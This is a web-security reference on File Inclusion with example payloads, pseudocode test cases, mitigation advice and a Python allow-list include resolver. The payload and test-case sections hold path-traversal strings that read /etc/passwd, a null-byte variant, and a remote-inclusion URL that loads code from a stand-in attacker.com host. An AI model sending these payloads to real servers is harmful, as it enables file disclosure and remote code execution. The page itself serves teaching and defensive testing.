File Inclusion

Description

File Inclusion occurs when a web application builds the path of a file it includes from user input without proper validation. An attacker can then make the server include files it never intended to expose: local files such as configuration or credential stores (Local File Inclusion), or, where the runtime allows includes from URLs, code fetched from an attacker-controlled host (Remote File Inclusion), which leads to disclosure of sensitive files or execution of arbitrary code.

Example with Scenario

Scenario: A web application dynamically includes a file based on a URL parameter. An attacker can manipulate the parameter to include sensitive files from the server.

Payloads and Test Cases

Payloads

  1. Local File Inclusion (LFI):

    /include?file=../../../../etc/passwd
  2. Remote File Inclusion (RFI):

    /include?file=http://attacker.com/malicious.php
  3. Null Byte Injection:

    /include?file=../../../../etc/passwd%00

Test Cases

  1. Local File Inclusion (LFI):

    • Payload:

      /include?file=../../../../etc/passwd
    • Test Case:

      # Send payload to the server
      sendPayloadToServer("/include?file=../../../../etc/passwd")
      # Verify if the application includes the /etc/passwd file
      checkFileInclusion("/etc/passwd")
  2. Remote File Inclusion (RFI):

    • Payload:

      /include?file=http://attacker.com/malicious.php
    • Test Case:

      # Send payload to the server
      sendPayloadToServer("/include?file=http://attacker.com/malicious.php")
      # Verify if the application includes the remote file
      checkRemoteFileInclusion("http://attacker.com/malicious.php")
  3. Null Byte Injection:

    • Payload:

      /include?file=../../../../etc/passwd%00
    • Test Case:

      # Send payload to the server
      sendPayloadToServer("/include?file=../../../../etc/passwd%00")
      # Verify if the application includes the /etc/passwd file despite null byte
      checkFileInclusion("/etc/passwd")

Mitigation

  1. Input Validation:

    • Validate and sanitize user input so that it cannot contain path traversal sequences (../), null bytes (%00) or URL schemes (http://), which are exactly the elements the payloads above rely on.

    • Use allow-lists to restrict input to expected file paths.

  2. Disable Dynamic Inclusion:

    • Avoid using dynamic file inclusion based on user input.

    • Use static file paths or mapped identifiers for inclusion.

  3. Limit File Access:

    • Restrict the web server process's file permissions so that it can read only the files it actually needs.

    • Use chroot or containerization to limit file system exposure.

  4. Error Handling:

    • Implement proper error handling to avoid revealing file system structure.

    • Return generic error messages without disclosing sensitive information.
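As an added example, not part of the original page, the following Python include handler applies mitigations 1 and 2 together: user input is an opaque identifier that is looked up in an allow-list of mapped file names, and the resolved path is additionally checked to lie inside the template directory. The BASE_DIR path and the template names are assumptions; the checks are run over the three payloads listed earlier (with %00 shown both raw and already URL-decoded, as a framework would hand it to the handler).

```python
import os
from typing import Optional

# Constructed example: the application's include directory (assumed path)
# and the only templates it may load, keyed by an opaque identifier.
BASE_DIR = os.path.realpath("/var/www/app/templates")
ALLOWED_INCLUDES = {
    "home": "home.html",
    "about": "about.html",
    "contact": "contact.html",
}


def resolve_include(identifier: str) -> Optional[str]:
    """Map a user-supplied identifier to an allow-listed file path.

    Returns the absolute path to include, or None when the request must be
    refused. The caller logs the refusal and returns a generic error message
    (mitigation 4) rather than echoing the attempted path.
    """
    # 1. Accept only a plain alphanumeric identifier. This rejects "../",
    #    a NUL byte (decoded %00), the literal "%00" and "http://" before
    #    anything touches the filesystem or performs a remote fetch.
    if not identifier or not identifier.isalnum():
        return None
    # 2. Unknown identifiers are refused, never turned into a path guess.
    relative = ALLOWED_INCLUDES.get(identifier)
    if relative is None:
        return None
    # 3. Defence in depth: even an allow-listed entry must resolve inside
    #    BASE_DIR once symlinks and ".." segments have been normalised.
    resolved = os.path.realpath(os.path.join(BASE_DIR, relative))
    if os.path.commonpath([BASE_DIR, resolved]) != BASE_DIR:
        return None
    return resolved


def classify_requests(file_params: list) -> dict:
    """Label each ?file= value as allowed or refused by the resolver."""
    return {p: ("allowed" if resolve_include(p) else "refused")
            for p in file_params}


if __name__ == "__main__":
    payloads = ["home", "../../../../etc/passwd",
                "http://attacker.com/malicious.php",
                "../../../../etc/passwd%00", "../../../../etc/passwd\x00"]
    for param, verdict in classify_requests(payloads).items():
        print(f"{verdict:8} {param!r}")
```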
